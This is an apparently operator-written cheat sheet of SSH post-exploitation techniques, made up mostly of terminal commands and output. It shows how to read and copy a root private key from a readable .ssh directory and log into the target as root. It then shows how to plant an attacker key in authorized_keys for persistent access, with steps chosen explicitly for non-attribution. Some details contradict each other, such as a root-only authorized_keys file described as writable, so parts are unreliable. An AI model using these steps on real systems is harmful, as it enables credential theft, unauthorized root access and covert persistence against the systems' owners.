SSH DIRECTORY

If read access is available to a user's .ssh directory (e.g., "/home/user/.ssh/" or "/root/.ssh/"), it is possible to exfiltrate the private SSH key "id_rsa". Once copied to the attacker's machine, this key can be used to authenticate as that user via SSH by passing it with the -i flag.

READ ACCESS

#enumerate
user@target:~$ ls -la ~/.ssh; ls -la /root/.ssh
 ls: cannot access '/home/user2/.ssh': No such file or directory
 total 20
 drwxr-x--- 1 root user2 4096 Feb 12  2021 .
 drwxr-x--- 1 root user2 4096 Feb 12  2021 ..
 -rw------- 1 root root   571 Feb 12  2021 authorized_keys
 -rw-r--r-- 1 root root  2602 Feb 12  2021 id_rsa
 -rw-r--r-- 1 root root   571 Feb 12  2021 id_rsa.pub

#
user@target:~$ cat /root/.ssh/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEAt3nX57B1Z2nSHY+aaj4lKt9lyeLVNiFh7X0vQisxoPv9BjNppQxV
 PtQ8csvHq/GatgSo8oVyskZIRbWb7QvCQI7JsT+Pr4ieQayNIoDm6+i9F1hXyMc0VsAqMk
 05z9YKStLma0iN6l81Mr0dAI63x0mtwRKeHvJR+EiMtUTlAX9++kQJmD9F3lDSnLF4/dEy
 G4WQSAH7F8Jz3OrRKLprBiDf27LSPgOJ6j8OLn4bsiacaWFBl3+CqkXeGkecEHg5dIL4K+
 aPDP2xzFB0d0c7kZ8AtogtD3UYdiVKuF5fzOPJxJO1Mko7UsrhAh0T6mIBJWRljjUtHwSs
 ntrFfE5trYET5L+ov5WSi+tyBrAfCcg0vW1U78Ge/3h4zAG8KaGZProMUSlu3MbCfl1uK/
 ...==
 -----END OPENSSH PRIVATE KEY-----

#
root@oco:~$ nano target-94.237.48.12-id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEAt3nX57B1Z2nSHY+aaj4lKt9lyeLVNiFh7X0vQisxoPv9BjNppQxV
 PtQ8csvHq/GatgSo8oVyskZIRbWb7QvCQI7JsT+Pr4ieQayNIoDm6+i9F1hXyMc0VsAqMk
 05z9YKStLma0iN6l81Mr0dAI63x0mtwRKeHvJR+EiMtUTlAX9++kQJmD9F3lDSnLF4/dEy
 G4WQSAH7F8Jz3OrRKLprBiDf27LSPgOJ6j8OLn4bsiacaWFBl3+CqkXeGkecEHg5dIL4K+
 aPDP2xzFB0d0c7kZ8AtogtD3UYdiVKuF5fzOPJxJO1Mko7UsrhAh0T6mIBJWRljjUtHwSs
 ntrFfE5trYET5L+ov5WSi+tyBrAfCcg0vW1U78Ge/3h4zAG8KaGZProMUSlu3MbCfl1uK/
 ...==
 -----END OPENSSH PRIVATE KEY-----
 
 * paste copied key value

root@oco:~$ chmod 600 target-94.237.48.12-id_rsa

 * restrictive permissions on the key file are required; otherwise ssh
   refuses to use a private key that is readable by other users

root@oco:~$ ssh -i target-94.237.48.12-id_rsa [email protected] -p 45074
 Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.1.0-10-amd64 x86_64)

  * Documentation:  https://help.ubuntu.com
  * Management:     https://landscape.canonical.com
  * Support:        https://ubuntu.com/advantage


 This system has been minimized by removing packages and content that are
 not required on a system that users do not log into.
 
 To restore this content, you can run the 'unminimize' command.

 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.

root@target:~#

WRITE ACCESS: NON-ATTRIBUTION METHOD

With write access to a target user's .ssh directory, an attacker can append their public key to the target's authorized_keys file, granting SSH access as that user. This only works if the attacker already controls the target user, or the file's ownership and permissions otherwise remain acceptable to the SSH daemon: with StrictModes enabled (the default), sshd ignores an authorized_keys file or .ssh directory that is writable by users other than its owner.

#identify whether write access is allowed
user2@target:~$ ls -la /root/.ssh
 total 24
 drwxr-x--- 1 root user2 4096 Feb 12  2021 .
 drwxr-x--- 1 root user2 4096 Jun  8 02:27 ..
 -rw------- 1 root root   571 Feb 12  2021 authorized_keys
 -rw-r--r-- 1 root root  2602 Feb 12  2021 id_rsa
 -rw-r--r-- 1 root root   571 Feb 12  2021 id_rsa.pub

 * write access identified in the authorized_keys file
 
#use for non-attribution
root@oco:~$ sudo adduser --disabled-password --gecos "" deploy
 Adding user `deploy' ...
 Adding new group `deploy' (1003) ...
 Adding new user `deploy' (1003) with group `deploy (1003)' ...
 Creating home directory `/home/deploy' ...
 Copying files from `/etc/skel' ...
 Adding new user `deploy' to supplemental / extra groups `users' ...
 Adding user `deploy' to group `users' ...

 * this creates a local user "deploy" with no password set; it cannot log in
   until access is explicitly granted

root@oco:~$ sudo -u deploy -i

 * the -i flag starts a login shell as the specified user
 
root@oco:~$ ssh-keygen -t rsa -b 3072 -C "" -f ~/.ssh/target-94.237.48.12-stealth_key
 Generating public/private rsa key pair.
 Created directory '/home/deploy/.ssh'.
 Enter passphrase (empty for no passphrase): 
 Enter same passphrase again:  
 Your identification has been saved in /home/deploy/.ssh/target-94.237.48.12-stealth_key
 Your public key has been saved in /home/deploy/.ssh/target-94.237.48.12-stealth_key.pub
 The key fingerprint is:
 SHA256:NpCtK/Xs8H2ZmWfXufjMP5AhKIRYhJwxNYbnewyY13o 
 The key's randomart image is:
 +---[RSA 3072]----+
 |  .oX*.          |
 |   *oo.+         |
 |    = = . .      |
 |   o + = . . .   |
 |    . B S   . o  |
 |     + E .   o   |
 |    . = o    =. o|
 |     . + .  * *oo|
 |        o .. +.*=|
 +----[SHA256]-----+

 * the -C "" sets an empty comment instead of the default username@hostname
  * the -f key option saves the private key as key and the public key as key.pub
    - key is the private key that is kept secret
    - key.pub is the public key that is deployed on the target
    
#append the ...stealth_key.pub content to the target's authorized_keys file
root@oco:~$ cat /home/deploy/.ssh/target-94.237.48.12-stealth_key.pub
 ssh-rsa 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
 
 * copy this public key into the target's WRITABLE authorized_keys file
    - no youruser@yourhost comment is required when adding the public key to authorized_keys
    - the youruser@yourhost part is an optional comment that the SSH daemon ignores during authentication
    - it exists only for human readability and has no effect on functionality
       - the comment can be replaced with something innocuous such as key1
        
user2@target:~$ nano /root/.ssh/authorized_keys
 ssh-rsa...
 ssh-rsa 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
 
 * there can be multiple entries, one per line
 
#access the target
root@oco:~$ ssh -i ~/.ssh/target-94.237.48.12-stealth_key [email protected] -p 45074
 The authenticity of host '[94.237.48.12]:45074 ([94.237.48.12]:45074)' can't be established.
 ED25519 key fingerprint is SHA256:KDcF5lg81jNEGgdr67bEo+Ui1pmsyHXKnw/ZHPLZCyY.
 This key is not known by any other names.
 Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
 Warning: Permanently added '[94.237.48.12]:45074' (ED25519) to the list of known hosts.
 Enter passphrase for key '/home/deploy/.ssh/target-94.237.48.12-stealth_key': 
 
 Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.1.0-10-amd64 x86_64)

  * Documentation:  https://help.ubuntu.com
  * Management:     https://landscape.canonical.com
  * Support:        https://ubuntu.com/advantage


 This system has been minimized by removing packages and content that are
 not required on a system that users do not log into. 

 To restore this content, you can run the 'unminimize' command.
 Last login: Sun Jun  8 02:27:59 2025 from 10.30.18.213

root@target:~$
